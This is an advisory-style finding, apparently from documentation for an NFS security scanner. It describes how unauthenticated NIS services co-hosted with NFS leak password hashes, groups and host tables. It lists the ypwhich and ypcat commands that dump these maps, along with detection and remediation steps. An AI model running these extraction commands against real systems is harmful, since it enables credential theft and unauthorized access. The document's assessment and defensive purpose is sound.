F-5.3: NIS Credential Extraction via Co-hosted RPC¶
Classification¶
- Severity: High
- CVSS Vector: Network / Low Complexity / No Auth Required
- Affected Versions: Systems running NIS (ypserv/ypbind) alongside NFS
- Prerequisite: NIS domain name discoverable; ypserv registered in portmapper
Summary¶
NIS (Network Information Service, formerly YP "Yellow Pages") is an RPC-based directory service frequently co-hosted on the same machines as NFS. When portmapper enumeration reveals ypbind/ypserv, an attacker who can determine the NIS domain name can extract password hashes, group memberships, hostnames, and mail aliases — all without any authentication.
NIS is discovered through the same portmapper (port 111) scan that finds NFS, making it a natural lateral finding during NFS assessments.
Technical detail¶
Discovery¶
NIS services appear in portmapper output alongside NFS/mountd/NLM:
program vers proto port service
100004 2 tcp 798 ypserv # NIS server
100004 2 udp 800 ypserv
100007 2 tcp 809 ypbind # NIS client binding
100007 2 udp 813 ypbind
Domain name enumeration¶
The NIS domain name is required for queries. It can be obtained via:
# If you have local access or a shell:
domainname
# Via RPCBind (some implementations leak it):
rpcinfo -p target
# Brute-force with ypwhich:
ypwhich -d <guessed-domain> target
Credential extraction¶
Once the domain name is known, ypcat dumps all NIS maps without authentication:
# Dump password hashes (equivalent to /etc/passwd + /etc/shadow combined)
ypcat -d <domain> -h <target> passwd.byname
# Dump group memberships
ypcat -d <domain> -h <target> group.byname
# Dump host table
ypcat -d <domain> -h <target> hosts.byname
# Dump mail aliases
ypcat -d <domain> -h <target> mail.aliases
Available NIS maps¶
| Master File | Maps | Content |
|---|---|---|
| /etc/passwd | passwd.byname, passwd.byuid | User credentials (may include hashes) |
| /etc/group | group.byname, group.bygid | Group memberships |
| /etc/hosts | hosts.byname, hosts.byaddr | Hostnames and IPs |
| /usr/lib/aliases | mail.aliases | Mail routing |
Why this matters for NFS¶
- NIS credentials reveal UID/GID mappings used across the NFS environment
- Password hashes can be cracked to obtain credentials for legitimate access
- Host tables reveal the full NFS infrastructure topology
- Group memberships identify which GIDs grant access to sensitive exports
Impact¶
- Full credential extraction (usernames + password hashes) without authentication
- Topology discovery of the NFS infrastructure
- UID/GID mapping intelligence enables targeted AUTH_SYS spoofing
- Cracked credentials may grant Kerberos-authenticated NFS access on v4 servers
Detection (nfswolf)¶
The scanner should: 1. Check portmapper output for ypserv/ypbind registration (programs 100004/100007) 2. Flag co-hosted NIS as an informational finding 3. Optionally attempt domain name enumeration and ypcat extraction
Remediation¶
- Migrate from NIS to LDAP/Kerberos — NIS has no authentication whatsoever
- Restrict NIS to trusted subnets via TCP wrappers or firewall rules
- Use NIS+ or LDAP if directory services are required
- Remove NIS entirely if not needed:
apt remove nis - Never store password hashes in NIS — use shadow passwords with LDAP backend